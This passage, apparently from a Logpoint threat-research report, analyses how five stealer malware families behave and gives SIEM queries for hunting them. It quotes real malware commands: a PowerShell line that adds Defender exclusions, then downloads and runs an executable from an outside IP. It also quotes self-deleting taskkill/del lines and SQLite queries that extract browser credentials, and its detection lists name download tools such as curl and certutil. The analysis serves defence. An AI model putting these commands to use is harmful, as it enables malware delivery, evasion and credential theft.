 Indicator Removal:File Deletion (T1070.004) One typical behavior observed in malware is the capability to delete files left over from intrusion activities. Adversaries may download additional tools or other non-native files into a system, leaving traces indicating the actions taken within a network. These files can be deleted during or after intrusion to reduce the adversary's footprint. PowerShell.exe -WindowStyle hid "Add-MpPreference -ExclusionExtension "C:\Users\admin\AppData\Local\Temp"; "Add-MpPreference -ExclusionExtension ".exe"; Start-Sleep -Seconds 5;"Invoke-WebRequest 'hxxp://141[.]95[.]16[.]111:8080/RiotGames.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\RiotGames.exe'";cmd.exe /c C:\Users\admin\AppData\Local\Temp\RiotGames.exe 1 2 3 4 5 6 Redline Stealer Remcos AgentTesla FormBook Vidar Indicator Removal: File Deletion (T1070.004) ✓✓ x x x https://tria.ge/230917-wzgasaef72/behavioral2 https://bazaar.abuse.ch/sample/12d387fb81acf1c5b37b66b29ec7b38554d89223e395687a57096f891fca6977/ https://app.any.run/tasks/8cd984a4-a489-4817-a0a2-8600a00f4f76/ https://app.any.run/tasks/9b51956d-350f-480f-b144-f692aad1562f 27www.logpoint.com According to a report from gridinsoft, after collecting the data, Vidar stealer compresses it into a ZIP archive and sends it to a command and control server. The malware then initiates a self-destruct process by executing the following command: The malware first terminates a process and waits for 6 seconds, deletes a file, and then removes all ".dll" files in the "C:\ProgramData" directory, and then exits the command prompt making tracing the events and understanding the impact on the system difficult due to lack of evidence. cmd.exe" /C taskkill /F /PID 2148 && choice /C Y /N /D Y /T 3 & Del "C:\Users\admin\Desktop\Redline stealer 2022 Crack\Libraries\stubbackup.exe 1 2 Redline Stealer Taskkill (source: any.run) C:\Windows\System32\cmd.exe” /c taskkill /im Devil.exe /f & timeout /t 6 & del /f /q “C:\Users\MalWorkstation\Desktop\Malware.exe” & del C:\ProgramData\*.dll & exit 1 2 3 https://gridinsoft.com/spyware/vidar https://app.any.run/tasks/9b51956d-350f-480f-b144-f692aad1562f/ 28www.logpoint.com Masquerading Malware often employs techniques to manipulate the properties of its artifacts, attempting to make them appear legitimate or harmless to both users and security tools. This tactic, masquerading, involves manipulating or abusing an object's name or location, whether legitimately or maliciously. The goal is to evade detection and observation. Masquerading: Match Legitimate Name or Location (T1036.005) Malware may mimic the names or paths of legitimate files or processes when naming or placing them. This deceptive technique is used to avoid detection and observation by security systems. For example, an adversary may place an executable in a commonly trusted directory, such as System32, or the name of a Windows process, such as svchost.exe. Defense Evasion:Process Injection (T1055) Stealer malware often employs process injection techniques to bypass process-based defenses and potentially elevate privileges. Process injection involves executing arbitrary code within the memory space of a separate, live process. This enables the malware to access the process's memory and system/network resources and potentially gain elevated privileges. In one observed sample, Redline Stealer has masqueraded as “svchost.exe” Redline Stealer Remcos AgentTesla FormBook Vidar Indicator Removal: File Deletion (T1070.004) ✓ x x x x Redline Stealer masquerading Svchost (source: any.run) Redline Stealer Remcos AgentTesla FormBook Vidar Defense Evasion: Process Injection (T1055) ✓ ✓ ✓ ✓✓ https://app.any.run/tasks/892c2cb5-c1a9-4b3b-bff0-3afbb6f7f5f7/ https://app.any.run/tasks/892c2cb5-c1a9-4b3b-bff0-3afbb6f7f5f7/ 29www.logpoint.com In observed Redline Stealer sample, after masquerading as the legitimate Windows binary svchost.exe, it was observed spawning “C:\Windows\Microsoft.NET\Framework{version}\CasPol.exe”. This command-line tool in Microsoft's .NET Framework allows users and administrators to manage and modify security policies for .NET code. Upon the launch of the CasPol process, svchost performs process injection on it. Subsequently, the injected process initiates its suspicious activities. According to the report from McAfee, in the observed Sample of Agent Tesla sample, a VBS file executed leveraging PowerShell commands and then utilized steganography to perform process injection into RegAsm.exe. RegAsm.exe is a Windows command-line utility that registers .NET assemblies as COM components, facilitating interoperability between different software. However, malicious actors can also exploit it for purposes such as process injection, potentially enabling covert or unauthorized operations. 
 The figure below illustrates the execution flow of Agent Tesla observed in the sample. According to the report from perception point, Remcos has abused Regasm for Process hollowing. After the Remcos agent is unpacked from the gzip archive, the DLL initiates the process hollowing technique. It begins by launching the legitimate RegAsm.exe process in a suspended state and injecting the unpacked Remcos agent. Subsequently, the RegAsm.exe process executes on the user's system with the injected Remcos embedded within it. According to the report from Spixnet, Vidar’s second-stage loader employs process injection to load the payload into memory. Specifically, it utilizes a process hollowing technique to inject the VIDAR binary into an AppLaunch.exe process. According to the report from Vmray, Formbook has been observed utilizing a process “exoplorer.exe” initiated from a native Windows tool to conceal itself. VBS First PowerShell Second PowerShell Malware injected in RegAsm.exe Steganography DLL hidden
 in image Encoded 
 text file Final payload Infection Chain Agent Tesla (Source: McAfee) https://www.logpoint.com/wp-content/uploads/2023/04/etpr-redline-stealer-malware-outbreak.pdf https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/#:~:text=The%20infection%20process%20of%20Agent,avoid%20detection%20during%20static%20analysis. https://perception-point.io/blog/behind-the-attack-remcos-rat/ https://www.spixnet.com/cybersecurity-blog/2023/01/05/analyzing-a-vidar-infostealer-sample https://www.vmray.com/cyber-security-blog/formbook-september-2020-malware-analysis-spotlight/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/#:~:text=The%20infection%20process%20of%20Agent,avoid%20detection%20during%20static%20analysis. 30www.logpoint.com This involves injecting a section into explorer.exe through a combination of functions, including NtOpenProcess, NtCreateSection, and NtMapViewOfSection. Defense Evasion: Obfuscated Files or Information (T1027) To evade detection and analysis, most malware employs techniques to obscure their payloads, such as encryption, encoding, or obfuscation. This behavior is prevalent across different platforms and networks to evade defense. Malware often employ various methods such as compression, archiving, or encryption to obfuscate their payloads, making detection and analysis challenging for defenders. This tactic is commonly observed across different types of malware, including stealer malware. Defense Evasion: Credential Access (TA0006) The Credential Access tactic refers to techniques of stealing credentials such as usernames and passwords. With valid credentials, attackers can escalate privileges, move around a network, access restricted data, and carry out other malicious activities. Credential Access serves as one of the primary objectives for stealer malware. 
 Credentials from Password Stores: Credentials from Web Browsers (T1555.003) Stealer Malware often retrieves credentials from web browsers by accessing browser-specific files. These files commonly contains saved credentials like website usernames and passwords, allowing users to avoid manual entry in the future. While web browsers typically store credentials in encrypted formats within a credential store, adversaries can employ methods to extract plaintext credentials from these browsers. Process Overview of Formbook (source: Vmray) Injection to explorer.exe (source: Vmray) Redline Stealer Remcos AgentTesla FormBook Vidar Defense Evasion: Obfuscated Files Or Information (T1027) ✓ ✓ ✓ ✓✓ https://www.vmray.com/cyber-security-blog/formbook-september-2020-malware-analysis-spotlight/ https://www.vmray.com/cyber-security-blog/formbook-september-2020-malware-analysis-spotlight/ 31www.logpoint.com Stealer malware targets a wide range of browsers, and most stealer malware will scan pre-defined lists of web browsers to search for and extract sensitive information. Redline Stealer queries the registry keys "SOFTWARE\WOW6432Node\Clients\StartMenuInternet" and "SOFTWARE\Clients\StartMenuInternet" to gather information about the browsers installed on the victim system. The stealer targets both Chromium-based browsers (such as Chrome and Opera) and Gecko-based browsers (such as Mozilla Firefox). Following that, it receives commands to retrieve data from various browser files, such as saved passwords, saved credit cards, auto-fill content, and browser cookies, which are locally stored on the device. Agent Tesla targets a specific set of browsers to extract login credentials, browser cookies, profiles, and ".sqlite" database files. In many browsers, sensitive data including passwords and browsing activities are stored in files within the browser's directory. Stealer malware attempts to access these files to extract credentials. Redline Stealer Remcos AgentTesla FormBook Vidar Credentials from Password Stores: Credentials from Web Browsers (T1555.003) ✓ ✓ ✓ ✓✓ Redline Stealer Network Stream (source: any.run) Agent Tesla Search for Web Browser (source: malgamy.github) https://any.run/report/2d9a9143fcb477dd37249f8d0f10ab0a7c5a509eecd5e69772ff8d319d75fcac/892c2cb5-c1a9-4b3b-bff0-3afbb6f7f5f7?_gl=1*1js1fuj*_gcl_au*MzczNDE0NTIxLjE3MDQ4NjU1ODE.*_ga*MTg4MzQyNzcwLjE2OTYxNjgyOTA.*_ga_53KB74YDZR*MTcwNzk3MTU0NS43NC4xLjE3MDc5NzMzMDkuMC4wLjA. https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/#browser-stealing-activities 32www.logpoint.com Similar behavior can be observed in Vidar, Formbook and Remcos which generally enumerates the “C:\ProgramData” directory with the objective of collecting sensitive data from the target system such as list of installed software, Cryptocurrency wallets, Autofill files (containing saved form data) Browser cookies, Browsing history, Files of specific formats, which may contain sensitive information or be of interest to the adversaries. However, direct extraction of login credentials is not always possible in modern browsers due to encryption and other security measures. Therefore, most stealer malware leverages SQLite databases, which contain important information related to the browser's operations on the system. Stealer Malware have been known to access these database files in attempts to extract and decrypt passwords saved within the browser. For example:

 Sqlite query targeting Firefox The method of extracting information from cookie files varies depending on the browser. For browsers like IE and Microsoft Edge, which store cookies in a standard .txt file, malware can easily steal them by scanning these browsers' directories. However, for browsers like Chrome and Firefox, which store cookies in SQL databases in less accessible locations such as the AppData/Roaming or /Local directory, the extraction process is more complex. Malware utilizes unique SQL queries tailored to each browser type to extract cookies, similar to how it retrieves login credentials discussed above. 
 Credential Access:Unsecured Credentials (T1552) In addition to stealing browser data, stealer malware has capability of stealing credentials from multiple VPN services, FTP applications, and email clients such as Outlook and Thunderbird. Typically, they achieve this by searching for configuration files within user directories (T1552.001) or registry (T1552.002). Credential Access:Steal Web Session Cookie(T1539) Stealer malware commonly targets web application or service session cookies as well. Numerous instances exist where malware specifically targets cookies stored within web browsers on the local system. Sqlite query targeting Chrome SELECT encryptedUsername, encryptedPassword,\ formSubmitURL FROM moz_login1 SELECT origin_url, username_value,\ password_value FROM logins1 Redline Stealer Remcos AgentTesla FormBook Vidar Credentials from Password Stores: Steal Web Session Cookie (T1539) ✓ ✓ ✓ ✓✓ Agent Tesla searching for FTP utilities (source: malgamy.github) https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/#email-stealing-activities 33www.logpoint.com Redline Stealer Remcos AgentTesla FormBook Vidar Credential Access: Unsecured Credentials (T1552) ✓ ✓ ✓ ✓✓ Discovery Discovery encompasses techniques that adversaries' malware employs to gather details about the target system. The goal is to obtain detailed information about systems, users, time, location, hosts, networks, system language, network shares, and other factors. 
 Stealer malware aims to gather crucial information about the target system, including details about users, installed software, operating system version, system default language, etc. To achieve this, stealer malware employs various techniques, with one common approach being the querying of registries. By accessing registry keys and other system artifacts, the malware can extract valuable data to further its malicious objectives. If specific conditions are not met, the execution of the malware may be terminated. For instance, Redline Stealer verifies whether the victim belongs to CIS countries, and if so, the malware halts the attack. This behavior is prevalent across numerous stealer malware variants. Collection Collection refers to the techniques that malware uses to gather relevant information from various sources in order to achieve its goals, such as Keylogging, which tracks and records every keystroke entry made on a computer. After collecting data, the next step is usually to exfiltrate the collected data. 
 Collection: Archive Collected Data (T1560) Malware may use techniques like compressing and encrypting collected data before exfiltration. By compressing data, adversaries can obscure its contents and reduce the size of data transmitted over the network, making it less noticeable and potentially avoiding detection. Before exfiltrating the collected data over SMTP, Agent Tesla archives the collected data, which is then transmitted to a fake SMTP email server. Similarly, Vidar stealer utilizes a similar method, packing the data into a ZIP archive before sending it to a command server. Redline Stealer Remcos AgentTesla FormBook Vidar Collection: Archive Collected Data (T1560) ✓✓x x x 34www.logpoint.com Input Capture: Keylogging (T1056.001) Most stealer malware employs keylogging to intercept user keystrokes, allowing adversaries to capture credentials as users type them. This tactic is commonly used to acquire credentials for accessing various accounts and systems. However, successful capture of credentials may require adversaries to intercept keystrokes over an extended period to gather sufficient data. Agent Tesla leverages “SetWindowsHookEx” Windows API to install a hook procedure, enabling it to monitor low-level keyboard input events. The callback hook procedure "this.EiqpViCm9()" is executed whenever the victim types on their device. At regular intervals, Agent Tesla captures and logs the program title, time, and contents of the victim's keyboard input to a local file named "%Temp%/log.tmp". Remcos includes keylogging capability, which creates a log file named "logs.dat" located in the directory "C: \ProgramData\Terminal" to capture keystrokes and clipboard data. Formbook creates a dedicated folder within the "%AppData%" directory, where it stores stolen data in multiple record files with the ".ini" extension. After process injection, FormBook persists within various target processes, continuously extracting victim data (user input and clipboard data) using inline hooked APIs. It directly copies the data into a large shared memory section, which is then saved into the record files ("*.ini") within the AppData folder. Redline Stealer Remcos AgentTesla FormBook Vidar Input Capture: Keylogging (T1056.001) ✓✓✓x x Agent Tesla SetWindowsHookEx (source: fortinet) Remcos Key file generation (source: cyfirma) https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/ 35www.logpoint.com Collection: Screen Capture (T1113) Stealer malware often attempts to capture screenshots of the desktop as part of Collection. Collection: Clipboard (T1115) Stealer malware has capability to collect data stored in the clipboard, capturing information copied by users. Stealer malware mostly utilizes the “Graphics.CopyFromScreen” .NET API to capture the desktop screen, enabling it to gather visual information from the victim's system. “Graphics.CopyFromScreen” is a method provided by the .NET framework that allows to capture the contents of the screen or a specific region of the screen as an image. It copies the pixels from the specified screen coordinates to a bitmap object, which can then be manipulated or saved for various purposes. This is often accomplished through various methods, with common techniques including the utilization of clip.exe or the “Get-Clipboard” cmdlet. Family Folder of FormBook (source: Fortinet) Agent Tesla Capturing a Screen Shot via Graphics.CopyFromScreen (Source: Qualys) Get-Clipboard Redline Stealer Remcos AgentTesla FormBook Vidar Collection: Screen Capture (T1113) ✓ ✓ ✓ ✓✓ Redline Stealer Remcos AgentTesla FormBook Vidar Collection: Clipboard Data (T1115) ✓ ✓ ✓ ✓✓ https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-in-phishing-campaign-part-iii https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla 36www.logpoint.com Command and Control Command and Control refers to the techniques used by adversaries to communicate with systems under their control in a victim network. To avoid detection, adversaries frequently attempt to blend in normal, expected traffic patterns. Application Layer Protocol:Web Protocols (T1071.001) Adversaries may leverage application layer protocols commonly associated with web traffic to evade detection or network filtering by blending in with existing traffic. Commands to the remote system, as well as the results of those commands, are often embedded within the protocol traffic exchanged between the client and server. According to report from Vmray, Agent Tesla incorporates the capability to utilize a Tor proxy for its HTTP communication. If the relevant configuration is enabled, Agent Tesla initially attempts to terminate all existing Tor instances before proceeding to download and configure the Tor client. Similarly, Formbook communicates with its command-and-control (C2) server via HTTP, primarily using GET and POST method to send and receive data. Redline Stealer Remcos AgentTesla FormBook Vidar Application Layer Protocol: Web Protocols (T1012) ✓ ✓ ✓ ✓✓ Agent Tesla Command and Control (source: Vmray) Formbook Command and Control (source: forescout) https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/ https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/ https://www.forescout.com/resources/formbook-infostealer/ 37www.logpoint.com Similarly, comparable behavior can be observed in Redline Stealer, Remcos and Vidar, both of which communicate with their command-and-control servers via the HTTP/HTTPS protocols. Command and Control: Non-Application Layer Protocol (T1095) Adversaries may utilize OSI non-application layer protocols like SOCKS, ICMP, or SOAP for communication between a host and the Command and control server, or among infected hosts within a network. In many instances of Redline Stealer, the transmission of stolen information occurs through the SOAP protocol. When communicating with the C2 server, the stealer establishes a BasicHttpBinding object that utilizes HTTP as the transport mechanism for transmitting SOAP messages. In most instances, Vidar establishes Command and Control communication channels through pages on social networks like Telegram, Mastodon, or even Steam. Instead of IP address for the command and control server, the malware references a social network page containing the Command and Control IP address in its name or description. Redline Stealer Remcos AgentTesla FormBook Vidar Non-Application Layer Protocol (T1095) ✓✓ ✓x x Redline Stealer (source: https://securityscorecard.com/) mastodon account used to route C2 Connection (source: Gridinsoft) https://securityscorecard.com/ https://gridinsoft.com/spyware/vidar 38www.logpoint.com Exfiltration
 Exfiltration Over Alternative Protocol Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Exfiltration over C2 Channel Adversaries may exfiltrate stolen data through an existing command and control channel, encoding it within normal communications and using the same protocol as command and control communications. In the majority of observed scenarios, Stealer malware exfiltrates collected data over the Command and Control (C2) channel. Redline Stealer Remcos AgentTesla FormBook Vidar Exfiltration Over Alternative Protocol (T1048) ✓xx x x Agent Tesla has been observed utilizing multiple methods to exfiltrate stolen sensitive data from compromised hosts. The exfiltrated data may be transmitted through FTP, SMTP, Telegram messaging or HTTP command and control servers. Since November 2021, Agent Tesla samples have been observed sending emails to compromised or potentially fraudulent email accounts on mail servers managed by hosting providers. Since December 2021, Agent Tesla had adapted to using these compromised email accounts to send stolen data to Gmail addresses. Agent Tesla SMTP Exfiltration (source: SANS) Redline Stealer Remcos AgentTesla FormBook Vidar Exfiltration Over Alternative Protocol (T1048) ✓ ✓ ✓ ✓✓ Windows host infected with AgentTesla Connect to mail server Send email to account on the server Emails with stolen data stored on that server Windows host infected with AgentTesla Connect to mail server Use account to send email to Gmail address Emails with stolen data store at Gmail account AgentTesla email exfiltration Through November 2021 Since December 2021 https://isc.sans.edu/diary/Agent+Tesla+Updates+SMTP+Data+Exfiltration+Technique/28190 39www.logpoint.com Detection and Response using Logpoint In our analysis of multiple stealer malware families, we have uncovered several intriguing patterns of behavior that can serve as valuable indicators for detection. Threat Hunting with Logpoint Converged SIEM Given the similarity in behavior across multiple stealer malware families, this presents analysts with significant opportunities to hunt for these threats. In this chapter, we'll explore how leveraging these common behaviors can enhance detection capabilities using the Logpoint Converged SIEM platform. By identifying and analyzing patterns of suspicious behavior commonly exhibited by stealer malware, we can develop detection strategies based on the premise that certain activities deviate from typical user actions, signaling potential abnormal behavior. This proactive approach enables us to stay ahead of emerging threats and mitigate risks effectively. Required Log Sourc� �� Window� �� a. Process Creation with Command Line Auditing should be enabled
 b. Registry Auditing should be enabled
 c. File System Auditing should be enabled
 d. PowerShell Script Block Logging should be enable� �� Windows Sysmo� �� Firewal� �� IDS/IPS Initial Access Suspicious Child Process Spawned by Microsoft Office Product Microsoft Office products have been widely abused as a means of delivering malicious payloads, frequently by embedding malicious content within seemingly legitimate documents or attachments. This technique employs social engineering tactics to trick users into opening these files, allowing for the infiltration on target systems. We can use this alert to detect and monitor suspicious child processes created by office applications. https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-registry https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-system https://success.trendmicro.com/dcx/s/solution/000291771?language=en_US&sfdcIFrameOrigin=null 40www.logpoint.com Possible Exploitation of CVE-2017-11882 We have observed multiple stealer malware families exploiting CVE-2017-11882 for initial access and payload execution. In the above alert we have covered all the suspicious child process spawned by Microsoft Office Products. Following alert can complement detection by monitoring for suspicious child processes spawned via EQNEDT32.EXE. Following alert can help to trigger any missed out events by the above alert for Equation Editor. label="Process" label=Create parent_process="*\EQNEDT32.exe" -"process" IN ["C:\Windows\System32\WerFault.exe", "C:\Windows\SysWOW64\WerFault.exe"] 1 2 label="Process" label=Create 
 parent_process IN ["*\WINWORD.EXE", "*\EXCEL.EXE", "*\POWERPNT.exe", "*\MSPUB.exe",
 "*\VISIO.exe", "*\OUTLOOK.EXE","*\MSACCESS.EXE","*\EQNEDT32.EXE", "*\Onenote.exe",
 "*\wordview.exe"] 
 ("process" IN ["*\AppVLP.exe","*\bash.exe","*\bitsadmin.exe","*\certoc.exe",
 "*\certutil.exe","*\cmd.exe","*\cmstp.exe","*\control.exe","*\cscript.exe",
 "*\curl.exe","*\forfiles.exe","*\hh.exe","*\ieexec.exe","*\installutil.exe",
 "*\javaw.exe","*\mftrace.exe","*\Microsoft.Workflow.Compiler.exe",
 "*\msbuild.exe","*\msdt.exe","*\mshta.exe","*\msidb.exe",
 "*\msiexec.exe","*\msxsl.exe","*\odbcconf.exe","*\pcalua.exe",
 "*\powershell.exe","*\pwsh.exe","*\regasm.exe","*\regsvcs.exe",
 "*\regsvr32.exe","*\rundll32.exe","*\schtasks.exe","*\scrcons.exe",
 "*\scriptrunner.exe","*\sh.exe","*\svchost.exe","*\verclsid.exe","*\wmic.exe", "*\workfolders.exe","*\wscript.exe","*\AppData\*","*\Users\Public\*",
 "*\ProgramData\*","*\Windows\Tasks\*","*\Windows\Temp\*",
 "*\Windows\System32\Tasks\*"]
 OR file in ["bitsadmin.exe","CertOC.exe","CertUtil.exe","Cmd.Exe","CMSTP.EXE",
 "cscript.exe","curl.exe","HH.exe","IEExec.exe","InstallUtil.exe","javaw.exe",
 "Microsoft.Workflow.Compiler.exe","msdt.exe","MSHTA.EXE","msiexec.exe","Msxsl.exe",
 "odbcconf.exe","pcalua.exe","PowerShell.EXE","RegAsm.exe","RegSvcs.exe",
 "REGSVR32.exe","RUNDLL32.exe","schtasks.exe","ScriptRunner.exe","wmic.exe",
 "WorkFolders.exe","wscript.exe"])
 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 41www.logpoint.com Execution As outlined in the preceding section, multiple vulnerabilities are exploited to achieve arbitrary code execution or execute malware. In this section, we will delve into techniques to detect these vulnerabilities and potential exploitation attempts. Possible Exploitation of CVE-2023-38331 The distinctive characteristic of this vulnerability lies in WinRAR's creation of a double file extension. We can identify potential exploitation of CVE-2023-38331 by monitoring for the creation of files with a double extension and a space by WinRAR. After the double extension file craetion, it's unusual and suspicious for file compression tools like WinRAR to spawn child process like Windows command shells, PowerShell. Following the successful exploitation of the vulnerability, the malicious payload might spawn these processes to execute arbitrary code, such as downloading second stage. Therefore we can hunt for WinRAR.exe for any suspicious child processes it spawns to further prove our hypothesis. LP_Process Pattern Match For CVE-2021-40444 Exploitation Successful exploitation of the vulnerability “CVE-2021-40444”, triggers the spawning of control.exe by Office application, Therefore we can use below query providing analysts with a key indicator to hunt for in process-creation events. label=File label="Create" label="Overwrite" path="\AppData\Local\Temp\Rar$" |process regex("(?P(\.[a-zA-Z0-9]{1,4} \.[a-zA-Z0-9]{1,4}))", file) |filter double_extension=* |chart count() by "process", path, file, double_extension 1 2 3 4 label= "Process" label= "Create" parent_process="\winRAR.exe" "process" IN ["\cmd.exe", "\cscript.exe", "\mshta.exe", "\powershell.exe", "\pwsh.exe", "\regsvr32.exe", "\rundll32.exe", "*\wscript.exe"] 1 2 3 label="Process" label=Create "process"="*\control.exe" parent_process IN ["*\winword.exe", "*\excel.exe", "*\powerpnt.exe"] -command="*\control.exe input.dll" 1 2 3 42www.logpoint.com Suspicious PowerShell Downloads Command During execution, many stealer malware families have leveraged PowerShell for multiple malicious purposes, with some primarily focused on downloading payloads or employing fileless techniques. Therefore, we can use the following query to hunt for suspicious PowerShell download commands. (label="Proces" label="Create" command IN ["*.Download*" or command="*Net.WebClient*"]) OR (norm_id=WinServerevent_id=4104 script_block="*System.Net.WebClient*" script_block="*Download*") -user IN EXCLUDED_USERS 1 2 3 4 Suspicious File Execution Using Wscript or Cscript VBS requires scripting hosts, such as wscript.exe, to interpret and execute code, manage user interactions, handle output and errors, and provide a runtime environment. Therefore, we can use the following query to look for suspicious file execution by wscript. Suspicious PowerShell Invocation Based on Parent Process Most malware heavily leverages PowerShell due to its wide range of capabilities, one effective indicator is to look for the parent process from which PowerShell is spawned. Therefore we can use the following query to look for suspicious PowerShell invocations. label="Create" label="Process" "process" IN ["*\wscript.exe", "*\cscript.exe"] -command="*.json*" command IN ["*.jse*", "*.vbe*", "*.js*", "*.vba*","*.vbs*","*.wsf*"] 1 2 3 4 label="process" label=create parent_process IN ["*\mshta.exe", "*\wscript.exe", "*\cscript.exe", "*\rundll32.exe", "*\regsvr32.exe", "*\services.exe", "*\winword.exe", "*\wmiprvse.exe", "*\powerpnt.exe", "*\excel.exe", "*\msaccess.exe", "*\mspub.exe", "*\visio.exe", "*\outlook.exe", "*\amigo.exe", "*\chrome.exe", "*\firefox.exe", "*\iexplore.exe", "*\microsoftedgecp.exe", "*\microsoftedge.exe", "*\browser.exe", "*\vivaldi.exe", "*\safari.exe", "*\sqlagent.exe", "*\sqlserver.exe", "*\sqlservr.exe", "*\w3wp.exe", "*\httpd.exe", "*\nginx.exe", "*\php-cgi.exe", "*\jbosssvc.exe", "*MicrosoftEdgeSH.exe", "*tomcat*"] "process"="*\powershell.exe" -path="*\Health Service State\*" 1 2 3 4 5 6 7 8 9 10 11 43www.logpoint.com Persistence Based on the above behavior analysis, it's evident that most families of stealer malware exhibit similar persistence behavior. This is commonly achieved through modifications to the Registry Autorun key or by leveraging Windows Scheduled Tasks. Autorun Keys Modification Detected We can use below query to hunt for Registry Run key modification by filtering key directories such as such as the user's Startup folder and ProgramData's directory. Suspicious Scheduled Task Creation We can hunt for task scheduling for binaries/files located in suspicious locations where scheduled tasks are not typically created. Alternatively, we can use the below query to look for schedule task creation events via XML file label=Registry label=Set label=Value -event_type=info target_object IN ["*\software\Microsoft\Windows\CurrentVersion\Run*", "*\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit*", "*\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell*", "*\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", "*\software\Microsoft\Windows NT\CurrentVersion\Windows*", "*\software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders*"] detail IN ["*C:\Windows\Temp\*", "*C:\$Recycle.bin\*", "*C:\Temp\*", "*C:\Users\Public\*", "*\C:ProgramData\*", "*C:\Users\Default\*", "*C:\Users\Desktop\*", "*\AppData\Local\*", "*Public\*", "*wscript*", "*cscript*", "*powershell.exe*"] -detail="*\AppData\Local\Microsoft\Teams\Update.exe *" 1 2 3 4 5 6 7 8 9 10 11 label=create label="process" "process"="*\schtasks.exe" command IN ["*/create*", "*-create*"] command IN ["*/xml*", "*-xml*"] (-integrity_level=system OR -integrity_label=*system*) -command = *.xml* ((-parent_process IN ["*:\ProgramData\OEM\UpgradeTool\CareCenter_*\BUnzip\Setup_msi.exe", "*:\Program Files\Axis Communications\AXIS Camera Station\SetupActions.exe", "*:\Program Files\Axis Communications\AXIS Device Manager\AdmSetupActions.exe", "*:\Program Files (x86)\Zemana\AntiMalware\AntiMalware.exe", "*:\Program Files\Dell\SupportAssist\pcdrcui.exe"]) OR (-parent_process = "*\rundll32.exe" command = "*:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc")) 1 2 3 4 5 6 7 8 9 10 11 norm_id=WinServer label=Schedule label=Task label=Create command IN ["*C:\Users\*", "*C:\Windows\Temp\*", "*C:\ProgramData\*"] -command="C:\ProgramData\Microsoft\Windows Defender\Platform\*" 1 2 3 We can also look for Sysmon registry events (Event IDs 12, 13, 14) to detect any modifications in the registry and use the following query to hunt for the creation of the scheduled task through registry events. 44www.logpoint.com (label="Registry" label="Key" label="Map" event_type=CreateKey "target_object"="*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\*" -target_object IN ["*\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Up dateOrchestrator*"]) 1 2 3 4 Privilege Escalation To elevate privileges, Vidar and Remcos have been observed disabling UAC by modifying the registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA”. We can use below query to hunt for the disabling of UAC via Registry. Defense Evasion It common for threat actors and malware to leverage PowerShell due to its extensive functionality, such as to bypass execution policies or conceal activities or from the user interface or many more. Therefore we use the below query to hunt for suspicious PowerShell strings. Suspicious PowerShell Parameter Substring Detected norm_id=WindowsSysmon label=Registry label=Set label=Value target_object="*EnableLUA*" detail="DWORD (0x00000000)" -user IN EXCLUDED_USERS 1 2 label="process" label=create "process" IN ["*\powershell.exe", "*\pwsh.exe"] command IN ["*-wi*h*", "* -nopr*", "* -nonin*", "* -ec*", "* -en*", "* -executionp*", "* -e* bypass*", "* -sta *","*FromBase64String*"] 1 2 3 45www.logpoint.com Windows Defender Exclusion As observed in behavior analysis, a common trait among all stealer malware variants is the use of the 'Add- MpPreference' cmdlet to modify Windows Defender configurations, often excluding specific files, paths, or extensions from scanning. We can use below query to hunt for suspicious Windows Defender exclusions. (label="Process" label="Create" command IN ["*-ExclusionPath*", "*-ExclusionExtension*", "*-ExclusionProcess*", "*-ExclusionIpAddress"] command IN ["*Add-MpPreference*, "*Set-MpPreference*"]) OR (norm_id=WinServer event_id=4104 script_block IN ["*-ExclusionPath*", "*- ExclusionExtension*", "*-ExclusionProcess*", "*-ExclusionIpAddress"] script_block IN ["*Add-MpPreference*, "*Set-MpPreference*"]) 1 2 3 4 5 6 7 8 46www.logpoint.com Suspicious Taskkill Activity Likewise, Redline Stealer and Vidar terminate processes and delete files from specified locations. We can use following query to hunt for suspicious usage of TaskKill. File Dropped in Suspicious Location As we have observed in behavior analysis, files are dropped most often within the Temp Directory. Threat actors frequently use these directories to drop payloads because they can blend in with normal operations. Therefore, we can use below query to hunt for suspicious files dropped in these locations. label="Process" label=Create "process"="*\taskkill.exe" (command= "*f *" command="*im *") OR command="*IM *" 1 2 norm_id=WindowsSysmon event_id=11 path IN ["C:\ProgramData*", "*\AppData\Local*", "*\AppData\Roaming*", "C:\Users\Public*"] -"process" IN ["*\Microsoft Visual Studio\Installer\*\BackgroundDownload.exe", "C:\Windows\system32\cleanmgr.exe", "*\Microsoft\Windows Defender\*\MsMpEng.exe", "C:\Windows\SysWOW64\OneDriveSetup.exe", "*\AppData\Local\Microsoft\OneDrive*", "*\Microsoft\Windows Defender\platform\*\MpCmdRun.exe", "*\AppData\Local\Temp\mpam-*.exe"] -file IN ["vs_setup_bootstrapper.exe", "DismHost.exe","*_PSScriptPolicyTest*.ps1"] 1 2 3 4 5 6 7 8 label=Registry label=Set 
 target_object IN ["*\SOFTWARE\Microsoft\Windows Defender*", 
 "*\SOFTWARE\Policies\Microsoft\Windows Defender*"] 
 ( 
